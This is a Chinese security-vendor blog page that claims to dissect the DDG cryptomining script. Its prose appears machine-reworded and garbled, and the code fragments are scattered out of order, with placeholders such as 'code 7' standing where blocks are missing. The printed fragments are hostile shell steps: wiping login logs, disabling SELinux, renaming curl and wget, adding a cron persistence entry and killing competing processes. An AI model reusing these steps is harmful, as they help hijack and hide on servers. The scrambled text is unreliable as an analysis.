实力解剖一枚挖矿足DDoS高防本,风骚操作亮瞎眼眸-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 实力解剖一枚挖矿足DDoS高防本,风骚操作亮瞎眼眸

实力解剖一枚挖矿足DDoS高防本,风骚操作亮瞎眼眸

小墨安全管家 2020-05-28 10:46 CC防护 89 ℃
DDoS防御

        then 

echo > /var/log/wtmp 

挖矿,是计算机技术界最让人迷惑的行为之一,但它赚钞票。据悉,这段足本名叫DDG,基本挖取了价值一千多万人民币的虚拟币货币。

瞧了瞧被操纵的机器,我连忙偷偷的重装了机器。

code 7

code 15

rtdir="/etc/sysupdates" 

chattr -i /etc/sysupdate* 

        fi 

bbdir="/usr/bin/curl" 

        then 

fi 

mv /usr/bin/wget /usr/bin/get 

足本为了复用一些功能,抽象出了特别多的函数。我们直截了当跳到main函数的执行,接着看一下那个过程。

注意[[ $cont =~ "update.sh" ]]这以小段代码,怪异的特别。[[ ]]是shell中内置的一具命令,支持字符串的模式匹配。使用=~的时候,甚至支持shell的正则表达式,强大的令人发指。它的输出结果是一具bool类型,于是可以使用||举行拼接。

then 

    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} 

mv /usr/bin/get /usr/bin/wge 

        elif [ "$http_code" -eq "405" ] 

            cur --connect-timeout 10 --retry 100 $1 > $2 

而后面的单小括号 (),是的是一具命令组,括号中多个命令之间用分号隔开,最终一具命令能够没有分号;和`cmd`的效果差不多是一样的。

在这段足本里,使用了pkill命令。那个命令会终止进程,并按终端号踢出用户,比较暴力。

... 

接下来是一系列相似的操作,最终,对iptables一批操作。

fi 

setenforce是Linux的selinux防火墙配置命令,执行setenforce 0 表示关闭selinux防火墙。2代表的是标准错误(stderr)的意思。于是后面,使用重定向符,将命令的错误输出定向到/dev/null设备中。那个设备是一具虚拟设备,意思是啥都不干。很适合静悄悄的干坏事。

code 10

我们上面讲到,足本改了几个命令的名字,其中就有curl。那个命令是这样的强大,以至于足本的作者都忍不住加了无数参数。

code 11

echo > /var/log/secure 

    then 

            cur --connect-timeout 10 --retry 100 $1 > $2 

ls -l /proc/$procid/exe | grep /tmp 

service iptables reload 

cont=`cat ${crondir}` 

code 3

downloads $config_url /etc/config.json $config_url_backup 

实力解剖一枚挖矿脚DDoS高防本,风骚操作亮瞎眼睛

接下来执行的是kill_sus_proc函数。

code 1

code 13


DDoS防御

当前位置:主页 > CC防护 > 实力解剖一枚挖矿足DDoS高防本,风骚操作亮瞎眼眸

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119